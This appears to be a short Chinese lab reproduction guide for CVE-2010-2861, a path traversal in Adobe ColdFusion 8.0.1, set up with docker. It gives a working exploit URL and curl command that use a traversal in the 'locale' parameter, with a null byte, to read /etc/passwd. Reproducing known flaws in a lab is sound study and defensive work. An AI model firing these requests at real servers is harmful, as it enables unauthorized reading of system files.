CVE-2010-2861 Adobe ColdFusion 文件读取漏洞 (复现)
启动 Adobe ColdFusion 8.0.1 版本服务器,执行如下命令:
docker compose up -d
启动后访问 http://your-ip:8500/CFIDE/administrator/enter.cfm,会看到初始化页面,输入密码 admin 完成环境初始化

读取 /etc/passwd 文件:
直接访问以下 URL:
http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwden
命令:curl "http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en"


浙公网安备 33010602011771号